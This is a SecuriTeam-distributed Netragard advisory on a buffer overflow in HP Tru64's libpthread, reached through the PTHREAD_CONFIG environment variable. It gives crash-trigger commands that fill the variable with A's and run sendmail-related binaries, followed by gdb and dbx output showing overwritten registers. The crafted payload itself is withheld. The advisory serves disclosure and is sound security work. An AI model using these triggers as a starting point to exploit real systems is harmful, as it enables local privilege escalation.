[UNIX] HP Tru64 libpthread Buffer Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



HP Tru64 libpthread Buffer Overflow
------------------------------------------------------------------------


SUMMARY

The pthread library (libpthread) provides "interfaces for developing
multi-threaded applications". libpthread suffers from a buffer overflow
vulnerability which may enable an attacker to execute arbitrary commands
on the system. This vulnerability may potentially be exploited by a
creating a specially crafted buffer and inserting it into the
PTHREAD_CONFIG variable.

DETAILS

Vulnerable Systems:
* libpthread version 5.1b (HPUX)

libpthread reads in the PTHREAD_CONFIG environment variable. It may be
possible to exploit libpthread on HP's tru64 by creating a specially
crafted buffer. The details below do not contain the specially crafted
buffer. Exploitation of this specific vulnerability is very difficult.

#############################################
#
# Insert 273 A's (41) into the PTHREAD_CONFIG variable
#
#############################################

OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)

#############################################
#
# Insert 274 A's (41) into the PTHREAD_CONFIG variable
#
#############################################

bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8
ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc
ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48
ra=0x3ff805c8bf8 inst=0xa5090028

#############################################
#
# Run newaliases in gdb with the -q flag.
#
#############################################

bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)... (no debugging symbols found)... (no
debugging symbols found)... (no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so

#############################################
#
# Execute a back trace (bt) within gdb
#
#############################################

(gdb) bt
#0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable). In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.

#
# Execute Info Registers within gdb
#

(gdb) i r
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x40 64
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x4141414141414141 4702111234474983745
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
a0 0xbf 191
a1 0x11fff9918 4831811864
a2 0x11fff96b0 4831811248
a3 0x11fff9b34 4831812404
a4 0x0 0
a5 0x11fff9b30 4831812400
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805c8bf8 4395905092600
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff98b0 4831811760
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805c8bf8 4395905092600
vfp 0x11fff9900 4831811840

frame 2
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x11fff9a50 4831812176
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x1 1
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1

###############################################
#
# The following registers, a0, a1, a2, a3, a4, a5, have been
# overwritten with A's (0x41).
#
###############################################

a0 0x4141414141414141 4702111234474983745
a1 0x4141414141414141 4702111234474983745
a2 0x4141414141414141 4702111234474983745
a3 0x4141414141414141 4702111234474983745
a4 0x4141414141414141 4702111234474983745
a5 0x4141414141414141 4702111234474983745
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805bc4f8 4395905041656
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff9a80 4831812224
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805bc4f8 4395905041656

############################################
#
# Other binaries which are linked agianst libpthread.so
# will also segfault when the PTHREAD_CONFIG variable
# is set to a large string of A's. The following is
# a list of some of those binaries
#
############################################

/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv

############################################
#
# Sendmail Example. Loading sendmail core file with
# the tru64 debugger.
#
############################################

bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"

warning: ./sendmail has no symbol table -- very little is
supported without it

signal Segmentation fault at >*[__putString, 0x3ff805c8bf8] ldq
t0, 64(s0)
(dbx) where
0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918)
[0x3ff805c8bf8]
1 __putFormatEol(0x4141414141414141, 0x4141414141414141,
0x4141414141414141, 0x4141414141414141, 0x4141414141414141)
[0x3ff805c8a74]
2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4, 0x3ffc01b8098,
0x3ff805c0a14) [0x3ff805bc4f4]

################################################
#
# Older versions are also vulnerable...
#
################################################

Older versions are also vulnerable...
tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv

%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"

is not valid
Memory fault

Other binareis on 5.0
/usr/bin/ladebug


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@xxxxxxxxxxxxx>
Netragard Security Advisories.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] Firebird Database Remote Database Name Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in Firebird Database's way of handling database names, ... GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, ... This GDB was configured as "i386-linux"...(no debugging symbols ...
    (Securiteam)
  • [UNIX] htget Remotely Exploitable Buffer Overflow (ReadLine)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.3-debian ... There is absolutely no warranty for GDB. ... This GDB was configured as "i386-linux"...(no debugging symbols found) ...
    (Securiteam)
  • [EXPL] Citadel/UX Remote Buffer Overflow Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Citadel/UX Remote ... Listed below is a remote ... GNU gdb Red Hat Linux ...
    (Securiteam)
  • [UNIX] SoX Local Buffer Overflow Vulnerabilities (st_wavstartread)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... the program first reads 4 bytes from the .WAV file into a variable. ... GNU gdb 6.1-debian ... There is absolutely no warranty for GDB. ...
    (Securiteam)
  • [REVS] Format String Exploitation Demonstration (Linux)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.5 ... Exit anyway? ... Our offset is 2. ...
    (Securiteam)